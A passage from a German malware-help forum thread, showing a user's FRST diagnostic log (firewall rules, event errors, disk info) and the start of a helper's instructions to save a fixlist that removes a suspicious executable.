Task: {FA896F4F-A556-4D46-9FA7-07A5D8BE02BF} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-09-11 18:02 - 2015-09-11 18:02 - 00803488 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2013-07-29 19:38 - 2012-03-27 01:33 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-10-18 15:40 - 2014-10-18 15:40 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\1eeea3ab8d69ec722bdcb28b8eb8dd75\IsdiInterop.ni.dll
2013-07-29 19:34 - 2012-02-01 15:25 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2013-07-29 19:51 - 2012-02-08 02:39 - 01198872 ____R () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData:NT
AlternateDataStreams: C:\ProgramData:NT2
AlternateDataStreams: C:\Users\All Users:NT
AlternateDataStreams: C:\Users\All Users:NT2
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2
AlternateDataStreams: C:\ProgramData\Application Data:NT
AlternateDataStreams: C:\ProgramData\Application Data:NT2
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2
AlternateDataStreams: C:\Users\Özkan\Anwendungsdaten:NT
AlternateDataStreams: C:\Users\Özkan\Anwendungsdaten:NT2
AlternateDataStreams: C:\Users\Özkan\AppData\Roaming:NT
AlternateDataStreams: C:\Users\Özkan\AppData\Roaming:NT2

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"

==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1539430812-113463742-2149372525-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 80.69.100.212 - 80.69.100.205
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

MSCONFIG\startupreg: FlashPlayerUpdate => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_152_Plugin.exe -update plugin
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{0C8F46B7-5D5F-431E-ADA8-8C17F61322AB}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{E7350369-DD38-419A-A7AF-738A7A50CDBC}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [TCP Query User{21455C06-6716-43BB-B154-3F07883EB7B7}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [UDP Query User{F2CA4BCA-A699-4C84-ABE1-D89C204D6ABD}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [TCP Query User{21B1FB1D-2CBC-4F19-81F1-C5D31357AD35}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{F7DE5662-1CF5-4B3B-BD74-2EB8428174E5}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [{DEB02161-3321-47A0-AEA7-B2383C6BA060}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{FB4E551E-3204-49F0-B2E0-CB812EE3A090}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6A2AD480-2EC5-4D0D-8CB4-7039D1BBB43E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{8651B310-EA93-453B-AD4F-40F2F79E12F0}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{908DEC77-2B49-4353-9F1D-67741687723B}] => (Allow) C:\Users\Ízkan\AppData\Roaming\Allmyapps\Allmyapps.exe
FirewallRules: [{BC440707-1268-4FE6-8896-03C83B5CFA5A}] => (Allow) LPort=80
FirewallRules: [{7C191149-D60C-454F-BB4A-F7265ACB46CF}] => (Allow) LPort=443
FirewallRules: [{96971A66-F6FB-41DF-821C-21A0F7C12744}] => (Allow) LPort=20010
FirewallRules: [{E9BB6E6B-67B0-45E3-8623-49821FF5A323}] => (Allow) LPort=3478
FirewallRules: [{A4796F1F-3471-40D3-82D3-67944C8F43DE}] => (Allow) LPort=7850
FirewallRules: [{38C3ED5B-5D9E-45AE-A2AC-2207C39E6DA2}] => (Allow) LPort=7852
FirewallRules: [{1CB0A71B-E2AE-43F6-97D1-91A6597BB8DB}] => (Allow) LPort=7853
FirewallRules: [{05C3202C-A18B-442D-A41A-6A7E5A065476}] => (Allow) LPort=27022
FirewallRules: [{F2027DFF-A0EE-4864-AFDA-5CC65BF9DCCF}] => (Allow) LPort=6881
FirewallRules: [{9F9F40DE-AE70-402C-8933-01A2A8BBE4F0}] => (Allow) LPort=33333
FirewallRules: [{DE71CD73-ADBE-4568-B562-DF04FE72D7AF}] => (Allow) LPort=20443
FirewallRules: [{164E1F9E-F18B-426F-9465-FCACC259547D}] => (Allow) LPort=8090
FirewallRules: [{1B75EAAA-850B-495E-B33B-11EE792B861A}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{4810EF78-A419-472B-83C2-A984D46F0A45}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{E209841A-EAD7-48BF-A32C-16171256B2BE}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{EE245FBD-7B09-4516-A65F-98112C18D269}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{C39A06DD-8B8E-4B76-B572-6843C4A5E418}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{45E9FB0F-2578-4E3B-A99E-D01C3F9E6B8C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{3AB4B367-747D-4F9C-804F-8FAAE655C533}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{3B95664C-65E3-4BF5-9451-4D722331E4F7}] => (Allow) LPort=2869
FirewallRules: [{4E8A21D5-4E9C-4ED4-926B-A82DA60AE973}] => (Allow) LPort=1900
FirewallRules: [{4705FBF4-0593-4D22-8199-94CEDA53A957}] => (Allow) C:\Users\Özkan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{C164648D-CE05-4A1E-A788-D034663CDEBF}] => (Allow) C:\Users\Özkan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{3FE1533B-F968-442A-B4F5-0C0D9A5FF04C}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{2285214F-608D-43DE-8C80-3D7C66FC8182}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{9DF2F638-22A2-46EF-8561-26D2A88308F8}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{8595951D-5034-4341-935A-AE3B325BDA5E}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{0EC9DAF6-6768-4531-BA4B-FF70797749AF}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{DCFCEE64-AD4E-401B-AE64-2A933CC8B06B}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{9DBCB308-62B2-43B7-B834-B92F772D5BA2}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4FF22754-95A5-4C16-96BD-19F379D43BA8}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4D8AD6F5-E15E-42D7-900E-F5CF7C66F18D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{804B76B7-81D0-4E6C-B3B4-FB3FE61D906E}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{19FE12BD-5FC0-42A9-8DDC-B9341ECE8035}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [{F6026884-630E-4C24-8660-C5E9F3149291}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{BAF800C1-4858-4E81-AAA1-5780BF1D964C}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{8CC7783F-D8C9-4A9B-8EB6-41D53FB062EA}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [TCP Query User{940C46C6-246A-46A5-B467-A27182698428}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{4E9D9BF5-3C86-4073-8E64-0AFE455126B7}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [TCP Query User{6B12E4F9-CDC9-43DB-83C4-110775A1D429}C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe] => (Allow) C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe
FirewallRules: [UDP Query User{C2165E93-9A8C-4891-A7D0-4DD9D43D2DEB}C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe] => (Allow) C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe
FirewallRules: [{0266C16B-9DB0-45AB-BDD1-F548726A58D5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{773C6A1C-230F-452A-93C5-0FC1E4ABA5CB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{AAC0A1FB-6DFC-48E8-B16F-0B4F3298645F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{366A568C-F27E-4DC5-848A-F4B53B92FCFB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{21B94E54-1DD2-4BF8-8F8D-C93DB82A0732}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{8D8D07C1-334E-4BD2-B252-CBCD0B52002F}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{05A0E04F-8AAF-4A75-BB40-4AFC757DD5FF}] => (Block) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{C11F5AA4-5B00-4016-A476-CE3CBF976E8D}] => (Block) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{51A23985-93D0-4E0D-8F5C-BF39FFEC4644}C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{4B828C4D-0982-487B-8883-D60F9FA4BAAE}C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{B7255A14-3607-4171-9CD6-F3BDC9B8B9E6}] => (Allow) C:\Users\Özkan\Documents\logs\Downloads\PBPHInstaller.exe
FirewallRules: [{F3B2B4AA-7F9D-474F-95C6-E16EFA8C9AA9}] => (Allow) C:\Users\Özkan\Documents\logs\Downloads\PBPHInstaller.exe
FirewallRules: [{34970EB3-AF92-4064-AEB5-9560FA11B08F}] => (Allow) C:\Users\Özkan\Documents\my games\PB\GameData\ggdllhost.exe
FirewallRules: [{2AC5FFB5-A3F7-4FAB-BC03-C85A8E1644EA}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\ggdllhost.exe
FirewallRules: [TCP Query User{9E19711D-48FE-4E48-A1B6-3C60ADECE9B5}C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe] => (Allow) C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe
FirewallRules: [UDP Query User{97AEAA5A-B3B7-4B54-A56E-89642AC83A9D}C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe] => (Allow) C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe
FirewallRules: [{245A956D-8AE0-44ED-94A2-5A64174DBB0D}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\Apps\PB\PointBlank.exe
FirewallRules: [{EBB5EF62-323E-4338-A3DA-A72903F9C975}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\Apps\PB\PointBlank.exe
FirewallRules: [TCP Query User{B11EA2A9-155D-44B0-9ACE-908512AA000A}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{00A2042E-C388-4F6C-8920-B20565A77CAF}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{C5C5DA2C-5336-480B-AEF7-C0F37A75F090}C:\nexon\combat arms eu\engine.exe] => (Block) C:\nexon\combat arms eu\engine.exe
FirewallRules: [UDP Query User{3C3BEC0A-FF69-4BE2-A48D-736D61978D94}C:\nexon\combat arms eu\engine.exe] => (Block) C:\nexon\combat arms eu\engine.exe
FirewallRules: [TCP Query User{EDAA3D02-CDD5-48A2-8916-444CC0384F0C}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2C2A5F9A-68C3-4A9A-85FF-73CB7DB44762}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{6CE5FEB5-A568-4611-8849-0BF6CC500E54}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{7D7C9632-5344-4D54-B217-A0708A7A0D69}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{DB391465-5607-4DF5-8EFD-68EC00796E86}] => (Allow) LPort=49167
FirewallRules: [{B70F1942-FCA8-48D6-BC69-5A1656946DE3}] => (Allow) LPort=5000
FirewallRules: [{E746A689-6A3F-43C1-B4DB-417A6A94FFB2}] => (Allow) C:\Program Files (x86)\GameforgeLive\Games\DEU_deu\Elsword\data\x2.exe
FirewallRules: [{CA0FC397-EA45-471B-81B7-D14162A6176F}] => (Allow) C:\Program Files (x86)\GameforgeLive\Games\DEU_deu\Elsword\data\x2.exe
FirewallRules: [TCP Query User{AD6D5770-A47B-400B-80CA-B1C5E921F286}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{D326B361-0FAC-423D-A8CF-CEF634518F79}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [TCP Query User{1CA208CC-0E60-4D7A-9F95-D647FFE96F58}C:\program files (x86)\warlord ii\game.bin] => (Allow) C:\program files (x86)\warlord ii\game.bin
FirewallRules: [UDP Query User{B6F84916-7DA1-4560-BF08-B3F6D4B8267C}C:\program files (x86)\warlord ii\game.bin] => (Allow) C:\program files (x86)\warlord ii\game.bin
FirewallRules: [TCP Query User{4CCF479B-249D-4329-827B-06BE36F6F976}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{B8B3BF25-2D6C-4AE8-8168-93CAC43DA23C}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{4D37D830-802A-4B82-AE5C-5702D45A013C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [{4547DE26-8CE8-4BE9-8FC6-6CAD6B07F718}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [TCP Query User{01DE63FC-FD42-48D1-8BC1-E3B7F19CB46F}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{08367BCB-2D3E-4464-9A42-C48FA412F362}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{F369092F-4781-4874-AC7B-DB4E99FD9FF2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A1FC346F-ED08-43C6-AA21-419E63D1F90D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{22A0AB29-3F15-4578-B976-FF69A53E577F}C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe
FirewallRules: [UDP Query User{65FE8B49-176E-4AFE-B39E-10FEAC40F603}C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe
FirewallRules: [TCP Query User{14016099-6DF5-4626-B91A-F0001D41369D}C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{09B65F16-F90A-4E46-9528-E91A99B97B6B}C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{C861E8A0-8C5D-4E5D-A1AF-AEFE85D9DDCB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe
FirewallRules: [{FB66CB97-5B56-4B66-88FE-D7CB13FE2C9E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe
FirewallRules: [{0C478274-2C5D-4403-BC56-C1E8088DDB41}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{805DD0DD-BF67-4E58-8B1E-20B33ACE9025}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5F74B1AE-2578-474A-9698-777F42CCA0AA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A3D912ED-1EDF-4114-AF43-C92F0FE363FD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{3966C528-4AE3-462C-AEDE-2CC007CF2E37}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{C697607B-08EC-4345-B4CB-632416559918}C:\users\özkan\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\özkan\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{A0025DC4-FCB8-492F-B8A1-59CC97BE7FE8}C:\users\özkan\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\özkan\appdata\roaming\spotify\spotify.exe

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: BitDefender Firewall NDIS 6 Filter Driver
Description: BitDefender Firewall NDIS 6 Filter Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: BdfNdisf
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (12/26/2015 07:59:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm ts3client_win64.exe, Version 3.0.18.2 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: fcc

Startzeit: 01d1400a319be181

Endzeit: 17

Anwendungspfad: C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\ts3client_win64.exe

Berichts-ID: c337186a-ac02-11e5-b7fe-b888e3cf1a37

Error: (12/26/2015 10:08:28 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/25/2015 02:45:24 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/24/2015 06:51:50 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/23/2015 11:47:35 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/23/2015 09:42:49 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm ts3client_win64.exe, Version 3.0.18.2 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 214

Startzeit: 01d13db99bdc1ea6

Endzeit: 5

Anwendungspfad: C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\ts3client_win64.exe

Berichts-ID: b89a0d60-a9b5-11e5-8fac-b888e3cf1a37

Error: (12/22/2015 10:45:10 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/21/2015 02:17:53 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/21/2015 01:58:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: steamwebhelper.exe, Version: 3.17.73.86, Zeitstempel: 0x566f1544
Name des fehlerhaften Moduls: libcef.dll, Version: 3.2526.1348.0, Zeitstempel: 0x5643e1a9
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00e2f176
ID des fehlerhaften Prozesses: 0x1194
Startzeit der fehlerhaften Anwendung: 0xsteamwebhelper.exe0
Pfad der fehlerhaften Anwendung: steamwebhelper.exe1
Pfad des fehlerhaften Moduls: steamwebhelper.exe2
Berichtskennung: steamwebhelper.exe3

Error: (12/20/2015 09:17:19 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005


Systemfehler:
=============
Error: (12/26/2015 10:53:08 PM) (Source: ipnathlp) (EventID: 31004) (User: )
Description: 0

Error: (12/26/2015 10:52:32 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "LogMeIn Hamachi Tunneling Engine" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.

Error: (12/26/2015 10:52:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "LogMeIn Hamachi Tunneling Engine" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (12/26/2015 10:52:10 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (60000 ms) wurde beim Verbindungsversuch mit dem Dienst LogMeIn Hamachi Tunneling Engine erreicht.

Error: (12/26/2015 10:51:30 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "LogMeIn Hamachi Tunneling Engine" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.

Error: (12/26/2015 10:50:05 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (12/26/2015 10:48:03 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen: 
BdfNdisf

Error: (12/26/2015 10:47:57 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Tender Switch" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (12/26/2015 10:47:56 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Mobizen plugin" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (12/26/2015 07:23:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Celeron(R) CPU B830 @ 1.80GHz
Prozentuale Nutzung des RAM: 44%
Installierter physikalischer RAM: 3932.36 MB
Verfügbarer physikalischer RAM: 2199.48 MB
Summe virtueller Speicher: 7862.93 MB
Verfügbarer virtueller Speicher: 6141.22 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:465.66 GB) (Free:178.11 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: BC5E5834)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

Bootsektor · 27.12.2015, 23:01

Hallo,

leider gibt es Probleme mit dem in der Formatverarbeitung des Fixes, bitte speichere diese Fixlist
im Notepad unter der Codierungseinstellung als Unicode ab.

Schritt 1

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:

ATTFilter

C:\Users\�zkan\AppData\Roaming\QiQMvbuugirF3MbSxPFk0Y.exe
